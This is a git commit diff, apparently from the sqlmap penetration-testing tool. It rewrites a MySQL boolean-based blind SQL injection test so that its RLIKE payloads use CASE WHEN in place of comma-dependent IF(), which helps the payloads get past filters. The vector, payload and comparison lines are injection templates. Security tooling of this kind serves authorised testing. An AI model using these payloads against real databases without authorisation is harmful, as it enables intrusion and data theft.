Making a comma-less RLIKE payload

This commit is contained in:
Miroslav Stampar 2013-10-11 00:39:11 +02:00
parent dbaa35f9fe
commit 6305c1e703

View File

@ -719,16 +719,16 @@ Formats:
<test>
<title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
<stype>1</stype>
<level>3</level>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>RLIKE IF([INFERENCE],[ORIGVALUE],0x28)</vector>
<vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
<request>
<payload>RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28)</payload>
<payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
</request>
<response>
<comparison>RLIKE IF([RANDNUM]=[RANDNUM1],[ORIGVALUE],0x28)</comparison>
<comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
</response>
<details>
<dbms>MySQL</dbms>